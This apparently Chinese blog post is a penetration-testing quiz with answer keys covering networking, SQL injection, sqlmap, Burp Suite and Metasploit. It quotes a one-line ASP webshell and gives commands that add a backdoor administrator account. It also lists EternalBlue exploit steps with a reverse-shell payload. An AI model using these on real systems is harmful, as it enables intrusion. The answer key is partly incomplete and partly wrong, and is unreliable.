信息安全小测试

一、单选题

1.在mysql数据库,下列哪个库保存了mysql所有的信息?

A. test
B. information_schema
C. performance_schema
D. mysql

2.一般来说用户上网要通过因特网服务提供商,其英文缩写为:

A.IDC
B.ISP
C.ASP
D.ISO

3.在OSI七层参考模型中,工作在三层以上的网络设备是?

A.集线器
B.网关
C.网桥
D.中继器

4.向有限的空间输入超长的字符串是哪—种攻击手段?

A.缓冲区溢出
B.拒绝服务
C.网络监听
D.IP欺骗

5.关于MAC地址下列说法错误的是?

A. MAC地址—共有48bit,它在出厂时就被固化在网卡中
B. MAC地址在每次系统重启后都会改变
C. MAC地址也称为物理地址,或通常所说的计算机的硬件地址
D.MAC地址在每次系统重启后不会改变

6.查询MySql数据库表中的数据用以下哪一项?

A. Insert
B.Cracte
C.Select
D.Updata

7.Mssql数据库的默认端口是哪个?

A.3306
B.1433
C.1521
D.3398

8.IPV4的IP地址有多少位?

A.64位
B.32位
C.18位
D.24位

9.在使用Burp Suite进行截包操作中,必须要做的是什么?

A.配置burp suite截包规则
B.关闭目录扫描工具
C.配詈好浏览器与Burp Suite的代理
D.勾选上Burp Suite 中的intercept server responses

10.SQLMap想要获取目标的—条系统的shell,以下参数哪个符合?

A. --sql-shell
B. --os-shell
c. --sql-query
D.–pwn-shell

11.通过修改Http Headers中的那个键值可以伪造来源网址?

A.X-Forwarded-For
B.User-Agent
C.Referer
D.Accept

12.下列不属于CMS系统的是?

A. DeDe
B.Durpal
c. Discuz
D.OpensuSE

13.HTTPS协议默认使用的端口是:

A.80
B.443
C.8080
D.21

14.成功上传—句话木马后,使用什么工具进行连接?

A.Nmap
B.啊D注入工具
C.中国菜刀
D.SqlMap

15.aspx的网站配置文件—般是哪个文件?

A.conn.asp
B.config.php
C.web.config
D.index.aspx

16.在Google Hacking语法中,下面哪—种是搜索指定类型文件?

A. inurl
B. intext
C. filetype
D. intitle

17.BurpSuite是用于Web应用安全测试工具,具有很多功能,其中能拦截并显示及修改http消息的模块是( )

A. Spider
B. Proxy
C. Intruder
D. Decoder

18.下列哪—项位于OWASP TOP10榜首?

A.跨站脚本攻击
B.注入漏洞
C.跨站请求伪造
D.失效的身份认证和会话管理

19.SqlMap注入工具是通过什么脚本语言编写的?

A. JAVA
B. Python
C. C++
D. Perl

20.以下那种工具可以用来Hash注入?

A. wce.exe
B. net.exe
C. cmd.exe
D. ipconfig.exe

21.下列对跨站脚本攻击(XSS)的解释最准确的是:

A.引诱用户点击虚拟网络连接的—种攻击方法
B.构造精妙的关系数据库的结构化查询语言对数据库进行非法访问
C.—种很强大的木马攻击手段
D.将恶意代码嵌入到用户浏览器的web页面中,从而达到恶意的目的

22.DNS域的本质是因特网中—种管理范围的划分。DNS中最大的域是:

A.顶级域
B.超级域
C.根域
D.—级域

23.使用菜刀连接一句话木马发生错误时,下列检查方法最不合适的是:

A.马上重传—句话木马
B.通过在浏览器访问,查看是否被成功解析
C.查看是否填入了正确的密码
D.在菜刀中查看是否选择了正确脚本语言

24.Linux操作系统下存储用户密码的文件是:

A. /etc/passwd
B. /etclshadow
C. /etc/hosts
D. /var/wwwlaccess.log

25.以下哪个不是搜索引擎

A. BaiDu
B. Google
C. YaHoo
D. Shadow

26.下列哪个DNS域名代表中国

A. .uk
B. .jp
C. .cn
D. .hk

27.在以太网中,用来区分不同设备的地址是?

A.IP地址
B.MAC地址
C.IPX地址
D.网路地址

28.路由器运行在OSI参考模型的哪一层?

A.数据链路层
B.网络层
C.传输层
D.会话层

29.黑客拿到用户的cookie后能做什么?

A.能知道你访问过什么网站
B.能从你的cookie中提取出帐号密码
C.能够冒充你的用户登录网站
D.没有什么作用

30.下列哪个选项不是常用的浏览器?

A. Firefox
B. chrome
C.IE
D.IEEE

31.在同一信道的同一时刻,能够进行双向数据传输的通信方式是?

A.半双工
B.单双工
C.全双工
D.加密传输

32.能将HTML文档从Web服务器传送到Web浏览器的传输协议是:

A. FTP
B.HTTP
c. SSH
D. webServer

33.SQLmap工具设置代理,以下哪个格式是对的?

A. --proxy:127.0.0.1
B. --proxy=1.1.1.1
C. --proxy=1.1.1.1:8080
D. --proxy:8080

34.建立—个新文件可以使用的命令为:

A. more
B. touch
c. less
D. cp

35.Linux的shell终端中从后台启动进程,应在命令的结尾加上符号:

A.#
B.@
C.&
D.$

36.渗透测试作为网络安全评估的一部分:

A.提供保证所有弱点都被发现
B.在不需要警告所有组织的管理层的情况下执行
C.找到存在的能够获得未授权访问的漏洞
D.在网络边界上执行不会破坏信息资产

37.世界上第一个计算机网络是?

A. ChinaNet
B. Internet
C.ARPANET
D.CERNET

38.Windows操作系统CMD下,查看当前目录下的文件及其文件夹的命令为:

A. ls
B. cat
C. dir
D. touch

39.以下传输介质中,抗干扰能力最强、宽带最宽的是?

A.无线信道
B.双绞线
C.光纤
D.同轴电缆

40.wwW服务在万维网上使用最为广泛,其采用的是什么架构?

A. C/S
B.服务器/工作站
C. B/S
D.分布式

41.绕过360添加用使用的是哪种办法?

A. net user
B.系统API
C. wce.exe
D. getpass.exe

42.以下哪个语句是用来查询SqlMap安装路径的语句?

A. select @@datadir;
B. select * from data;
c. select @@basedir;
D.select version();

43.127.0.0.1是什么地址?

A.A类地址
B.回环地址
C.B类地址
D.C类地址

44.以下属于物理层设备的是?

A.中继器
B.路由器
c.交换机
D.网桥

45.HTTP状态码是反应web请求结果的一种描述,以下状态码表示请求资源不存在的是:

A. 200
B. 404
C. 401
D.403

46.在TCP/IP中,解决计算机到计算机之间的通信问题的层次是

A.网络接口层
B.网际层
C.传输层
D.应用层

47.SQL注入漏洞属于哪—类漏洞?

A.高危漏洞
B.不是漏洞
C.中危漏洞
D.低危漏洞

48.实现从IP地址到以太网MAC地址转换的命令为:

A. ipconfig
B. ping
C. arp
D. traceroute

49.TCP的协议数据单元被称为?

A.比特
B.帧
C.分段
D.字符

50.主要用于加密机制的协议是:

A.HTTPS
B.FTP
C.TELNET
D.SSL

51.在IP地址方案中,159.226.181.1是一个

A.A类地址
B.B类地址
C.C类地址
D.D类地址

52.TCP和UDP相似之处是?

A.面向连接的协议
B.面向非连接的协议
C.传输层协议
D.以上均不对

53.用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段?

A.缓冲区溢出攻击
B.钓鱼攻击
C. DDOS攻击
D.暗门攻击

54.Linux下文件权限读、写、执行的数字依次是:

A.124
B.214
C.421
D.142

55.使用union的SQL注入的类型是:

A.报错注入
B.布尔注入
C.延迟注入
D.联合查询

56.HTTP请求头中,Referer代表什么意思?

A.表示客户端的浏览器信息
B.表示来到当前页面的上—个网址
C.表示是302重定向到其他网址
D.表示请求服务器的IP地址

57.—句话木马,如:<%eval request(“pass”)%>中,“pass"代表什么?

A.笔无意义的—个单词
B.—句话木马的连接密码
C.一句话密码连接成功后回显的提示
D.一个不可变得标志符号

58.以下关于DDOS攻击的描述,哪句话是正确的?

A.不需要攻击目标系统
B.以窃取目标系统上的机密信息为目的
C.导致目标系统无法处理正常用户的请求
D.如果目标系统没有漏洞,远程攻击就不可能成功

59.路由选择协议位于:

A.数据链路层
B.网络层
C.应用层
D.传输层

60.针对存在SQL注入的网站可以使用什么工具攻击?

A. MysQL
B. sqlmap
C. Appscan
D. Burpsuite

61.Internet的网络层含有四个重要的协议,分别为?

A.IPICMPIARP/TCP
B.IPIICMPIARP/RARP
C.TCP/ICMP/UDPIARP
D.ARP/RARP/UDP/ICMP

62.网络层、数据链路层、物理层传输的数据单位分别是?

A.字段、数据、比特
B.数据包、帧、字段
C.数据包、帧、比特
D.字段、数据包、帧

63.三次握手用于?

A.传输层的重复检测
B.传输层建立的连接
C.数据链路层的流量控制
D.传输层的流量控制

64.局域网的协议结构—般不包括?

A.数据链路层
B.网络层
C.物理层
D.介质访问控制层

65.退出交互模式的shell,应该怎么操作?

A. Ctrl+c
B. exit
C. back
D. quit

66.以下哪—项不属于XSS跨站脚本漏洞的危害:

A.钓鱼欺骗
B.身份盗用
C.SQL数据泄露
D.网站挂马

67.下列不属于系统安全的技术是?

A.防火墙
B.安全狗
C.防病毒

一、单选题答案

12345
BBCAB
678910
CBBCB
1112131415
CDBCC
1617181920
CBBBA
2122232425
DCABD
2627282930
CBBCD
3132333435
CBCBC
3637383940
CCCCC
4142434445
BCBAB
4647484950
BACCD
5152535455
BCBCD
5657585960
BBCBB
6162636465
BCBBB
6667
CB

二、多选题

1.以下为Linux操作系统能够安装的WEB容器是哪些?

A. Apache
B. Tomcat
C. lS
D. Nginx

2.以下为Linux操作系统发行版本的是:

A. Ubuntu
B. Centos
C. Deepin
D. BlackArch

3.文件上传漏洞产生的原因是什么?

A. WEB应用开放的文件上传功能,并对文件上传功能没有足够的限制
B.程序开发部署的时候没有考虑到系统的特性和过滤不严格
C.利用文件上传漏洞进行Cookie欺骗
D.攻击者通过WEB服务器解析漏洞绕过限制,导致可以任意上传文件

4.以下那两项是用户数据报的功能?

A.流量控制
B.系统开销低
C.无连接
D.序列和确认

5.以下为MSF框架的模块是:

A. exploit
B. auxiliary
C. post
D. Decoder

6.下面哪种语言是服务器端编程语言?

A. PHP
B.JAVA
C. HTML
D.ASP.NET

7.WEB服务器被入侵后,操作正确的是?

A.查看WEB服务器日志
B.查看是否有异常端口开放
C.重启服务器,更换IP地址
D.使用安全狗等安全软件清扫

8.常见的漏洞扫描工具有那些?

A. Nmap
B. Metasploit
c. CobaltStrike
D. SqlMap

9.SQL注入漏洞产生必须符合的两个条件:

A.参数是用户可控制的
B.数据库是可以远程控制的
C.参数是可以带入到数据库中
D.参数名是用户可以改变的

10.下列哪个是主流的关系型数据库管理系统?

A. Oracle
B. MySQL
C.IBM DB2
D. Microsoft Access

11.以下那些是Linux操作系统?

A. Kali
B. Backtrack
C. ubuntu
D. Centos

二、多选题答案

12345
ABDABCDABDBCABC
678910
ABDABDABDACABCD
11
ABCD

三、判断题

1.TCP22、23号端口为远程连接服务端口,可以采用植入木马、SQL注入等方式进行攻击。

2.执行SQLMap命令: sqlmap -u “http;/lurI/news?id=1” --current-user,可以获取当前用户名称。

3.本地攻击漏洞是攻击者通过网络,对连接在网络上的远程主机进行攻击。

4.在PHP中,通过GET方式发送的数据会保存到$ _GET数组中,通过POST发送的数据会保存到$_POST数组中。

5.信息收集是指通过各种方式获取所需要的信息。

6.目前已被视为最有效的SQL注入攻击防护方式是使用参数化查询。

三、判断题答案

123456
xx

四、填空题

1.启动MSF的图形化界面的命令是:______。
2.MSF的全称为Metasploit Framework,其命令行启动命令为:______。
3.由于用户登录基本都是使用HTML的Post方式提交账号和密码等信息,因此万能密码登录是一种典型的______型SQL注入攻击.。
4. _____ 也叫脆弱性,是指网络系统在硬件、软件、协议的具体事项或系统安全策略上存在的缺陷和不足。
5.以根开始的路径叫做______,以当前路径开始的叫做______。
6.在PHP中,变量是以______开头,其后是变量的______。
7.根据渗透测试的方法和视角分类,渗透测试可以分为:黑盒测试、______、______。
8.MSF中漏洞利用模块和辅助模块的启动命令分别是______、______。
9.webshell可以分为三类,分别是:______、______、______。
10.按照注入点类型进行分类,SQL注入可以分为数字型和______型注入。

四、填空题答案

1.armitage
2.msfconsole
3.post
4.漏洞
5.绝对路径、相对路径
6. $ 、名称
7. 白盒测试、灰盒测试
8. exploit、run
9.大马、小马、一句话木马
10.字符

五、问答题

1.渗透测试的流程。

2.使用nmap的UDP扫描技术扫描服务器(IP地址为172.10.0.25)上开放的UDP端口,请写出详细操作命令。

3.利用nmap扫描工具对服务器(IP地址为172.10.0.25)进行操作系统扫描渗透测试(必须要使用的参数),请写出详细操作命令。

4.使用nmap的TCP Connect()扫描技术扫描服务器((IP地址为:172.10.0.25)的1-1024之间开放的TCP端口,请写出详细操作命令。

5.获取到windows操作系统的shell,怎样创建后门账号?

6.书写MS17_010漏洞在MSF上的操作过程。

五、问答题答案

第一题

确定目标,信息搜集,漏洞探测,漏洞利用,权限提升,内网渗透,痕迹清理,撰写报告

第二题

nmap -sU 172.10.0.25

第三题

nmap -O 172.10.0.25

第四题

nmap -sT-p 1-1024 172.10.0.25

第五题

net user username passwod ladd
net localgroup administrators username /add

第六题

msf5>search 关键字
msf5>use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets //显示可以攻击的目标系统
msf5 exploit(windows/smb/ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >set rhost 目标靶机IP地址 
msf5 exploit(windows/smb/ms17_010_eternalblue) >set lhost kali IP地址
msf5 exploit(windows/smb/ms17_010_eternalblue) >set port 反弹端口
msf5 exploit(windows/smb/ms17_010_eternalblue) >exploit
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值